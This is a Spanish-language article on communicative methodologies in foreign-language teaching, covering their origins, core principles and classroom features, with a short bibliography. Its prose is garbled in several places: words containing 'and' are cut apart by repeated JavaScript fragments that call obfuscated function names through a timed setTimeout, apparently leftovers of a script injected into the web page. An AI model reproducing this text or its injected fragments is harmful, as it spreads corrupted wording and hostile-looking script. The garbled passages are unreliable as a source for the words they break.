LA METODOLOGÍA COMUNICATIVA EN LA ENSEÑANZA DE LENGUAS

Autora: Salvia Lois Lugilde

Las metodologías comunicativas en la enseñanza de lenguas han supuesto una revolución en el proceso de aprendizaje; a lo largo de este artículo se analizarán, de manera muy sintética, las principales características que comparten estos métodos.

A lo largo de la historia de la enseñanza de idiomas, el enfoque que más ha cambiado el panorama ha sido, sin duda alguna, el de tipo comunicativo.

Los primeros pasos tuvieron lugar a finales de los años sesenta, en un contexto en el que se empezaron a poner en cuestión los principios del enfoque situacional de la lengua en Gran Bretaña y del método audiolingual en los Estados Unidos. Así, la tesis central que provocó el cambio en el paradigma fue la de la importancia de un aspecto al que ningún teórico le había prestado mucha atención, esto es, la competencia comunicativa; en las épocas anteriores al surgimiento del enfoque comunicativo la enseñanza había estado centrada, fundamentalmente, en el conocimiento de estructuras lingüísticas. Entre los defensores de esta noción de competencia destacaron los lingüistas británicos Christopher Candom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andlin y Henry Widdowson. Sin embargo, esta nueva concepción de la enseñanza de lenguas fue construida y enriquecida con aportaciones de diversos campos de investigación: de la lingüística funcional británica, con nombres tan importantes como los de Halliday o Firth; de sociolingüistas americanos como Hymes, Gumperz o Labor; o todavía de la filosofía del lenguaje a través de autores no menos importantes como Austin y Searle.

Como se puede observar, este enfoque contaba ya, desde sus inicios, con una sólida fundamentación teórica proveniente de diferentes campos, lo que hizo que su expansión por diferentes países y escuelas fuese muy rápida. Precisamente, debido a todas esas ramificaciones, hoy en día no podríamos hablar de un único modelo de enfoque comunicativo, ni siquiera de un único teórico, sino de varios modelos y muchos autores. No obstante, como anteriormente se mencionaba, hay un objetivo central que comparten por igual todos los enfoques de tipo comunicativo: la competencia comunicativa como aspecto fundamental de la enseñanza de idiomas, a través del desarrollo de las cuatro destrezas lingüísticas. Así, este aprendizaje siempre está basado en la experiencia y centrado en el alumno.

Más concretamente, existen tres principios fundamentales dentro de esta concepción (Richard y Rodgers, 1986):

  • El principio de la comunicación, según el cual las actividades que conllevan la comunicación real son las más adecuadas para el aprendizaje.
  • El principio de las tareas, que presupone que aquellas actividades significativas que requieren el uso de la segunda lengua también favorecen el aprendizaje.
  • El principio del significado, según el cual la lengua significativa (aquella que transmite al interlocutor algo que realmente tiene un significado para él y no se interpreta como una mera práctica lingüística) sirve de apoyo al proceso.

Además de estos principios de carácter más abstracto, existen una serie de aspectos que definen a todos los enfoques comunicativos:

  • La estructuración del programa se realiza siempre en función de los temas y contenidos que interesen al alumnado, adquiriendo este último un papel mucho más importante. Por tanto, el profesorado ya no tiene un papel central, pasandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a tener una función motivadora y de contribución al aprendizaje.
  • Las actividades conllevan siempre un uso significativo de la lengua y serán muy variadas, implicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando una necesidad real de comunicación. Al fomentar los ejercicios abiertos, el error es un aspecto fundamental e imprescindible que demostrará que el alumnado está avanzandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en el proceso de aprendizaje.
  • Se trabaja con la lengua a nivel discursivo, superandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el limite oracional de los métodos anteriores. En consecuencia, se le da mayor importancia al nivel conversacional al tiempo que se atiende a la comprensión y producción de diferentes tipologías textuales.
  • Se acepta el uso de la lengua materna en contextos específicos, de la misma manera que se permite la traducción en determinados casos, siempre que beneficie al aprendiz.
  • Se dará mayor atención a la consecución del objetivo comunicativo y a la adecuación contextual en el uso de la lengua, en función de la situación, relación entre los interlocutores, registro, etc.

Hoy en día, las metodologías de tipo comunicativo son asumidas por la mayor parte del profesorado de lenguas en Europa; sin embargo, en la realidad cotidiana del aula todavía seguimos observandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con bastante frecuencia prácticas que se alejan bastante de este enfoque y que nos recuerdan más métodos tradicionales como el de la gramática-traducción. Esto también sucede con algunos manuales de lenguas extranjeras, en los que los contenidos no aparecen organizados en función de la competencia comunicativa y no existen ejercicios abiertos, sino tareas cerradas como completar frases a las que le falta alguna palabra (en las que no existe el aprendizaje significativo, sino una mera operación de analogía).

BIBLIOGRAFÍA

Sánchez Pérez, Aquilino (1997): Los métodos en la enseñanza de idiomas. Evolución histórica y análisis didáctico. Madrid: SGEL.

Richards, J. C. y Rodgers (2003): Enfoques y métodos en la enseñanza de idiomas.  Cambridge: Cambridge University Press.

http://cvc.cervantes.es/ensenanza/biblioteca_ele/diccio_ele/diccionario/enfoquecomunicativo.htm

http://cvc.cervantes.es/ensenanza/biblioteca_ele/diccio_ele/diccionario/programanociofuncional.htm

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.